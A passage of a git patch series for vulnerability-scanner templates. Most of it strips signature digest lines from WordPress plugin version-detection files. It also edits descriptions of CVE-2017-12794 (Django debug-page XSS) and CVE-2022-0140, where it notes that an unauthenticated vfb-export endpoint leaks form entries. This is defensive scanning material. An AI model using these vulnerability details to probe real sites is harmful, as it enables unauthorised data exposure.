'(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022070905cd60a9586159dd940a0779ae3cf43223d67046b111019c8d9e290b8765d02210090037a612a16e8554e49f99b665e25cc7b551233523063bf26da67ce8476ba4c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml index d12099d385..d0dc8d92bb 100644 --- a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml +++ b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502207e3a47d67c9abe199207336e1bf7aad5e4768b7adac575568a622d21335eff9e022100be76dc1c38413da40cd54f437b37c8a6ce2f3e0d8ae013fa1f9fc5572f0e62f9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml index 54e4ea9529..c49bbc2b6d 100644 --- a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml +++ b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100da72c56e29cd9e2045551a56e60f4b52cf8b0d5221372a2f77ba070b98361e6902202db0fb7ee8a1b9ef327a7c6693200969d46691a9e38d2c0acd6e341b6d242c35:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml index 5be73aa871..27586cbd9d 100644 --- a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml +++ b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100f6de4e57051788f4d4f8e04d8f8597398ce8e8446fd2319f41d252448c111c9902201c859fd6d4720760b2e1d6705a8a0c6ee668cfb5a195cb5321c28861d7a8f58d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml index b553a7fb4e..946272f0a9 100644 --- a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220179691bdf9cea0dee7cf65031fee9a13a8581bafe0250445959e777d0be03fe8022100fa170dd4680bcef0ce37fb8681971157ece67465ecec5183e382cf0f45ce3936:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml b/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml index d95e20ee85..aa29706872 100644 --- a/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502205e6a3435b0c6158d749b4194d2eae99256f092dede8a37273e51256dfdd37f9402210099aa682ba65630b3b9398251862b9c18870ed531d7e03190174de0339043cb56:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-payments.yaml index b694be4746..290d53ab7e 100644 --- a/http/technologies/wordpress/plugins/woocommerce-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-payments.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100d3de41fee416b472011b7c5c4bfd90112db9ee53649123a03ca670d5bdb9a5e0022100b66ac7274857ce48c064dbdb0d24dc5e4450297b5d26d3cd7e36a51288ef008f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml index fb7dc97b45..f7c9ef9b1f 100644 --- a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100b07a2a7a5ef009173b7c995bd32825c3ead87345df3bf7bb8b1d0f6d1909d2e902204cec7badb524fcd652cb008e4f63c3d4fd203f387464511e48be3c458f655a19:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml index b56254fe0e..f1c16275a2 100644 --- a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022068b1df2670abcbaf995e272727ba0e755bbd1ca7aeb3fc1c9c7662b6d7502d7a0220518d080be076250498c47126618c286714fe65aaa340f45424e06ba241aa104c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-services.yaml b/http/technologies/wordpress/plugins/woocommerce-services.yaml index ec77ae1751..fc072e19d8 100644 --- a/http/technologies/wordpress/plugins/woocommerce-services.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-services.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100db830fa5925a209119f671ca54eff21d3bc6cd2638f8c33d069bc924ffd792c002203a81f1f4d1a45f791174a2245a5bc64f03d3ae427a4591b319587b5071610081:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce.yaml b/http/technologies/wordpress/plugins/woocommerce.yaml index 21d0363fe4..da9df0e8a5 100644 --- a/http/technologies/wordpress/plugins/woocommerce.yaml +++ b/http/technologies/wordpress/plugins/woocommerce.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022027fd270bbbeb5000c25893ebde8a39e09cbad5f4a27366b297d2fca47522e6c7022100a92711c56e4129f340bbfab6dee26098b04b11041694dd1ad31aac205758feb4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordfence.yaml b/http/technologies/wordpress/plugins/wordfence.yaml index 07df724447..f8113d9750 100644 --- a/http/technologies/wordpress/plugins/wordfence.yaml +++ b/http/technologies/wordpress/plugins/wordfence.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100810cabacd2bb106635ef9a5df3e6a5cb8bfc74c9695d80dda077a070a26ec010022100eea3bf99c5a81e5c18cff7b931f9b4775369c318eac8d94663a3f1addd09ead9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordpress-importer.yaml b/http/technologies/wordpress/plugins/wordpress-importer.yaml index 817d880b4f..5f80282ab2 100644 --- a/http/technologies/wordpress/plugins/wordpress-importer.yaml +++ b/http/technologies/wordpress/plugins/wordpress-importer.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100bca9a31a10f2b8bcde896dfafc196ecbdd4f605e819370704c141ace3daf0b71022100a3579513b2228034e89b43a721182d2fe5fab07d7a7f6222d29c45b3cd5eeac0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordpress-seo.yaml b/http/technologies/wordpress/plugins/wordpress-seo.yaml index 81396be0e3..5725d5bb3f 100644 --- a/http/technologies/wordpress/plugins/wordpress-seo.yaml +++ b/http/technologies/wordpress/plugins/wordpress-seo.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100b646fc45e9eee4501b0bec6bfa590de66d87b81b9f4d4319675cc3d2d1d7f215022100c0c45a3856802758a3ccf4a9b307abe1cfd31654ec1974b465c9bd87b85183f2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/worker.yaml b/http/technologies/wordpress/plugins/worker.yaml index 7df074fc54..f67a8bc18a 100644 --- a/http/technologies/wordpress/plugins/worker.yaml +++ b/http/technologies/wordpress/plugins/worker.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100b9be0adfb3e32b8b176779ffa7be1cfec2f0d6abd9fdc5d2763b31f9dded454602200e8f342cdc315bfb106ef6cc941913cd2d8188f82712abd7b46672e0a2bf1082:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-crontrol.yaml b/http/technologies/wordpress/plugins/wp-crontrol.yaml index e582934bb4..a773829b7d 100644 --- a/http/technologies/wordpress/plugins/wp-crontrol.yaml +++ b/http/technologies/wordpress/plugins/wp-crontrol.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022069ae483ba94eef02a40cf31ad792162198aa186f8a96c253e0e64d67bdf71d36022100ee228e2e4deab2feb3b3f99720a91e8d3640d9cedabf2c81e86ad4b93aaedf33:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml index 5ab89de333..b9bd4be0a8 100644 --- a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220401c70cdc47334101875fac6b12909d3d77326a58ce5ea07632d36818dda8d8802203abed0979ecfd0397ec797124031d1d2509e3b4607ae3ebd381f52aa143c2e57:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-file-manager.yaml b/http/technologies/wordpress/plugins/wp-file-manager.yaml index 91e5b67592..bece4ce486 100644 --- a/http/technologies/wordpress/plugins/wp-file-manager.yaml +++ b/http/technologies/wordpress/plugins/wp-file-manager.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a0048304602210084b366ca68c98e308be8f033816004f589c0c26504b74d90994362ba5b74439f022100bb108af284c5fbdfec6f1cf3bc928df8f9c1444acd272d47cfac0be11d020b2e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-google-maps.yaml b/http/technologies/wordpress/plugins/wp-google-maps.yaml index fc965ea4ae..138b0aa9a6 100644 --- a/http/technologies/wordpress/plugins/wp-google-maps.yaml +++ b/http/technologies/wordpress/plugins/wp-google-maps.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022040b343a7341cbee226d1b3418de3fb173e18e765954d3c7f8e354171b6ca83cc022100dc1d315180b1c79dc9e730394e9dbf874ba446bce0047d56189eaa0842848371:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml index 5f3c4ffd57..68bf71bc83 100644 --- a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml +++ b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502207c1702d774c1412ce45aad8898bd0d9fa929fcefafd669be333dd18bb85ee311022100b6b19f7e6db7debe9ad05e2a0c17be63789f2848c0824b4d3218c8a894120866:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml index 0fff413175..10dad2d2fb 100644 --- a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml +++ b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100cf3ca42218d5720d8de7104331683cda689a54518743be882a5b65f547241e58022100f3f298a67ebb90861bbbdefb8e6284d3cbead2cbf31cd224ca22855d66cda654:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-migrate-db.yaml b/http/technologies/wordpress/plugins/wp-migrate-db.yaml index 6791d687f2..e9efe6fb53 100644 --- a/http/technologies/wordpress/plugins/wp-migrate-db.yaml +++ b/http/technologies/wordpress/plugins/wp-migrate-db.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502207f8f070461594d12551d675921bcbf090bbf8567ae4d36b2d31bee172e92c1a70221009001a8ff814f4bdd1f4ea4e7e8bda70894acf4e1d9a128d3f7ab87dbc14d6ada:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml index 879389c243..c3d10f0135 100644 --- a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml +++ b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220019eef868786b7e3a7f8bbc22434c8eca007bdb77dc16eb07239a170c9e50ceb02210090e0c41a63d64212c03f8531e913d13cdd68069f9a7bde808e4f996121f784fd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-optimize.yaml b/http/technologies/wordpress/plugins/wp-optimize.yaml index 269dc70306..4a8bc6b75c 100644 --- a/http/technologies/wordpress/plugins/wp-optimize.yaml +++ b/http/technologies/wordpress/plugins/wp-optimize.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221008c1eb3991840ad6f70c466e719b15645de6cc2839227cc7404fadab608c72ffd02205eac5299c79c1d7cc3f078f733947ec16a9c08aa7b6535350698fff97c93d373:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-pagenavi.yaml b/http/technologies/wordpress/plugins/wp-pagenavi.yaml index fe355e046a..d2c74355bd 100644 --- a/http/technologies/wordpress/plugins/wp-pagenavi.yaml +++ b/http/technologies/wordpress/plugins/wp-pagenavi.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100a81558b769498f286557f8a59a5b6c4c483c30808dcb5524a2c1ee97b3c66f17022100d313933610743418c274f3cb33b82ada008046157e5594ca151b10f60e2390fb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-reset.yaml b/http/technologies/wordpress/plugins/wp-reset.yaml index 084dc7a99d..94b8494b08 100644 --- a/http/technologies/wordpress/plugins/wp-reset.yaml +++ b/http/technologies/wordpress/plugins/wp-reset.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100eed3f82d09dd1db2f9112289822f281bf652cd522cef3614d5df68c5314f8b68022100971414efbc452552685c1f018aa3a93bdd58c375222a3e2edd9bda98dd1badd0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml index 7234708d44..108aba79e9 100644 --- a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml +++ b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100f22c9129ca5d98a4420f41a9ad5e2f0300cbd6888f002710b172b3fd419a92f502206f2fed69ea42f30c85482ac38773b931614d0781103d9c8076f39c291b31ce01:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-rollback.yaml b/http/technologies/wordpress/plugins/wp-rollback.yaml index 7102985b34..f6f6bf5566 100644 --- a/http/technologies/wordpress/plugins/wp-rollback.yaml +++ b/http/technologies/wordpress/plugins/wp-rollback.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022042595e7d49d3294e06d930e1df0860c1520a0ab606e470216814c3184c09ee5f02200eff10fdda45e68daa23e3b8978591f2dcad6c52bb47497f1ea752b400b5f02a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-seopress.yaml b/http/technologies/wordpress/plugins/wp-seopress.yaml index f76b130ff4..483cb7cac7 100644 --- a/http/technologies/wordpress/plugins/wp-seopress.yaml +++ b/http/technologies/wordpress/plugins/wp-seopress.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220445e0a74641e4cedd3922fcebdc6b4e440b9049414002d511c42a970ba182c2c0220297416b098f091f5de295c0e71ca361476232c947d37899f95c0e5d4300b272a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml index 5e5962b21e..a132c98df4 100644 --- a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml +++ b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100d2f9191c85799b2b64932449795eeb941d9bdf7be1c06e5c90cbe9d6fc03c10b0220439381c20a96bdf7f68ee4481d2640f56e046f8e4310bd89d7b6c0432063cffe:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-smushit.yaml b/http/technologies/wordpress/plugins/wp-smushit.yaml index b5665aaa01..135bbee046 100644 --- a/http/technologies/wordpress/plugins/wp-smushit.yaml +++ b/http/technologies/wordpress/plugins/wp-smushit.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100a8b2d6719dda34bc45ea6f9d8dc8a1e34c0e35ad7980f855f049eff195214b8d02203ff686548492d00e86e943ba820784a516c6210ba7752ce48fb2ac8f82eda611:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-statistics.yaml b/http/technologies/wordpress/plugins/wp-statistics.yaml index 52bd9c277e..5b690d96c0 100644 --- a/http/technologies/wordpress/plugins/wp-statistics.yaml +++ b/http/technologies/wordpress/plugins/wp-statistics.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402207ce981da9b7215aa6b1f264a82efdafb46513dda4d35f323c110a1daf28f150a0220252b6d3ae5129f389947d27d7cdac18c81b406e1688911b6a87b2853df0fd55c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-super-cache.yaml b/http/technologies/wordpress/plugins/wp-super-cache.yaml index 0ddf157335..16c7d6cff5 100644 --- a/http/technologies/wordpress/plugins/wp-super-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-super-cache.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022042a9b30f45af14387f036d052f4e9552534dddfb398693b0cd47d556f86cff3f02207be535d94ff0b170ec8998ea6181c44af12ee7d0321b793568568550953b6591:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml index 83b476419c..ab099f357e 100644 --- a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402202946480af5d7660351c95e7474a59b5c92c7a636f942a1e56cf6e83c07cd677502205e2ec7be1d7c89beb9f9de97167e0982d3f955492df861194b6f0f4816aff5ca:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml index 6c3db127ad..ad0b8f8fed 100644 --- a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100fb14f2ef461abfc2344a63c0d86e3359b42ce7d6cdb2fd4be290b20b1101de1502210093fdc705c446ca3ac22146588d4a5735bfbabc0e4dd93ff12ce70cb1c26b3d5b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpforms-lite.yaml b/http/technologies/wordpress/plugins/wpforms-lite.yaml index 33c32bded9..aaaf0f9a17 100644 --- a/http/technologies/wordpress/plugins/wpforms-lite.yaml +++ b/http/technologies/wordpress/plugins/wpforms-lite.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502202399c3c3e8333cd49230461f2f07463ea6ea681d853e064d64fb854a09dfc4c9022100ad733b893e5709ad5101d5cc3b11de80b2f23916b656278e92c27e9475128c17:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wps-hide-login.yaml b/http/technologies/wordpress/plugins/wps-hide-login.yaml index da9a3cd859..f943c7afeb 100644 --- a/http/technologies/wordpress/plugins/wps-hide-login.yaml +++ b/http/technologies/wordpress/plugins/wps-hide-login.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022004018ead2c366d9f288b995a6f367f85e015235bf692a723503dd7cc466b942c02210083dff94e6101509dbe7a6ff97579c783428fb33af6963f1ddbe6ba7c19e4f23f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml index 3d826fbeab..062e5c85b4 100644 --- a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml +++ b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022070334cac171fb979d6dbc659ea6c61ac6d5678801831a7005593bc423769d61c0220265e8eb5069c67c85ddf09e690dc1d35bc38629767a9c15479fbb825d1573c0f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml index a23a428069..6dcfdda117 100644 --- a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml +++ b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100f9f07b16e638ed961f0eb6e841ef828412b7946ac9f7d713797b3bfb9e3da48b022007f4001059f14091ba344ac34a459cc2a29faadd4f7744621149a62cf0979686:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 7824f40d6ab2be1abb9bbfd197d01547e7fa1d02 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Krzysztof=20Zaj=C4=85c?= Date: Fri, 19 Jul 2024 08:02:13 +0200 Subject: [PATCH 1438/1841] Removing unneccessary text from template description --- http/cves/2017/CVE-2017-12794.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/http/cves/2017/CVE-2017-12794.yaml b/http/cves/2017/CVE-2017-12794.yaml index e601acc5ff..a403f32cb9 100644 --- a/http/cves/2017/CVE-2017-12794.yaml +++ b/http/cves/2017/CVE-2017-12794.yaml @@ -5,7 +5,7 @@ info: author: pikpikcu severity: medium description: | - Django 1.10.x before 1.10.8 and 1.11.x before 1.11.5 has HTML autoescaping disabled in a portion of the template for the technical 500 debug page. Given the right circumstances, this allows a cross-site scripting attack. This vulnerability shouldn't affect most production sites since run with "DEBUG = True" is not on by default (which is what makes the page visible). + Django 1.10.x before 1.10.8 and 1.11.x before 1.11.5 has HTML autoescaping disabled in a portion of the template for the technical 500 debug page. Given the right circumstances, this allows a cross-site scripting attack. impact: | Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential session hijacking, defacement, or theft of sensitive information. remediation: | @@ -51,4 +51,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100efedfed019372fabd4ec462ca8128065b5c74513db3e9e565a9f74f45b7714c802206c5fe554f4a89a675c078661b0ad020fd9ccad466d1ecd821a5632bbc74749ba:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100efedfed019372fabd4ec462ca8128065b5c74513db3e9e565a9f74f45b7714c802206c5fe554f4a89a675c078661b0ad020fd9ccad466d1ecd821a5632bbc74749ba:922c64590222798bb761d5b6d8e72950 From c7e277bdb6aae105b6528f70d11d226ad1b82995 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Krzysztof=20Zaj=C4=85c?= Date: Fri, 19 Jul 2024 08:04:01 +0200 Subject: [PATCH 1439/1841] Removing unneccessary text from template description --- http/cves/2017/CVE-2017-12794.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/cves/2017/CVE-2017-12794.yaml b/http/cves/2017/CVE-2017-12794.yaml index a403f32cb9..310a39e82a 100644 --- a/http/cves/2017/CVE-2017-12794.yaml +++ b/http/cves/2017/CVE-2017-12794.yaml @@ -5,7 +5,7 @@ info: author: pikpikcu severity: medium description: | - Django 1.10.x before 1.10.8 and 1.11.x before 1.11.5 has HTML autoescaping disabled in a portion of the template for the technical 500 debug page. Given the right circumstances, this allows a cross-site scripting attack. + Django 1.10.x before 1.10.8 and 1.11.x before 1.11.5 has HTML autoescaping disabled in a portion of the template for the technical 500 debug page. We detected that right circumstances (DEBUG=True) are present to allow a cross-site scripting attack. impact: | Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential session hijacking, defacement, or theft of sensitive information. remediation: | From 68f003f136f4599dd99d4ea0bbb0c858f966e564 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Krzysztof=20Zaj=C4=85c?= Date: Fri, 19 Jul 2024 08:33:35 +0200 Subject: [PATCH 1440/1841] Fixing vulnerability name --- http/cves/2022/CVE-2022-0140.yaml | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/http/cves/2022/CVE-2022-0140.yaml b/http/cves/2022/CVE-2022-0140.yaml index 5c5b1d5e09..39215d225a 100644 --- a/http/cves/2022/CVE-2022-0140.yaml +++ b/http/cves/2022/CVE-2022-0140.yaml @@ -1,11 +1,11 @@ id: CVE-2022-0140 info: - name: WordPress Visual Form Builder <3.0.8 - Cross-Site Scripting + name: WordPress Visual Form Builder <3.0.8 - Information Disclosure author: random-robbie severity: medium description: | - WordPress Visual Form Builder plugin before 3.0.8 contains a cross-site scripting vulnerability. The plugin does not perform access control on entry form export, allowing an unauthenticated user to export the form entries as CSV files using the vfb-export endpoint. + WordPress Visual Form Builder plugin before 3.0.8 contains a information disclosure vulnerability. The plugin does not perform access control on entry form export, allowing an unauthenticated user to export the form entries as CSV files using the vfb-export endpoint. impact: | Successful exploitation of this vulnerability could lead to the execution of arbitrary script code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | @@ -29,7 +29,7 @@ info: vendor: vfbpro product: visual_form_builder framework: wordpress - tags: cve,cve2022,wpscan,xss,wordpress,vfbpro + tags: cve,cve2022,wpscan,disclosure,wordpress,vfbpro http: - raw: @@ -53,4 +53,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220555e72b8a7ce8ba848bc013ba68905a0892db7854b4d5a487b4b342d5595b0cf0221009227b34829104b03a2a178ba1afc5c13f05c4db7f63a5971c34a3a95685fa9bb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 